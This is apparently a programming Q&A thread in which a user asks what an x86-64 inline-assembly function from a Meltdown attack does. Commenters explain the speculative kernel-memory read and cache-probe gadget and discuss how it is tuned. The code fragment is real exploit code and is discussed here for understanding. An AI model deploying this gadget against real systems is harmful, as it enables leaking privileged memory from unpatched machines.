# Melt-Down attack implementation in X86

Tags: assembly, x86-64, spectre

Below code is part of meltdown attack and i could not understand what it is doing, can any one explain me what is below code is doing.

```
static void __attribute__((noinline))
speculate(unsigned long addr)
{
#ifdef __x86_64__
asm volatile (
    "1:\n\t"

    ".rept 300\n\t"
    "add $0x141, %%rax\n\t"
    ".endr\n\t"

    "movzx (%[addr]), %%eax\n\t"
    "shl $12, %%rax\n\t"
    "jz 1b\n\t"
    "movzx (%[target], %%rax, 1), %%rbx\n"

    "stopspeculate: \n\t"
    "nop\n\t"
    :
    : [target] "r" (target_array),
      [addr] "r" (addr)
    : "rax", "rbx"
);
```

Comment: Hard to tell without more context. I assume the `add` chain is just a crude delay. I further assume that `addr` is modified by another thread. So then this code repeatedly reads that value until it's non-zero and multiplies by 4k (the page size) and tries to read that item from the `target_array`.

Comment: Looks like that cache-read side-channel described in the initial Meltdown paper.  I'm surprised this even assembles without anything to disambiguate byte vs. word source for `movzx`.  Apparently it defaults to `byte`, aka AT&T `movzbl`

Comment: BTW, `add $0x141, %%rax` seems a strange choice for a dep chain.  IDK why you'd want a larger-than-necessary instruction, and this is REX + opcode + imm32 = 6 bytes, and it only gives you 1 cycle per instruction of latency.  `imul eax,eax` would be shorter and slower.  Maybe they want something long enough to fill the ROB, and ~200 cycles is enough for the indexed load to trigger eviction and get into a load buffer.  Meltdown doesn't work if `(%[addr])` isn't already hot in L1d cache: http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/ so `imul eax,eax` or `sqrtsd` aren't needed?